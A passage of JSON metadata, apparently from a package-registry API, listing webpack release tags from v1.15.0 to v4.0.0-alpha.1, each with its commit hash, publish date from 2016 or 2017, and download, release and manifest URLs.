itHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.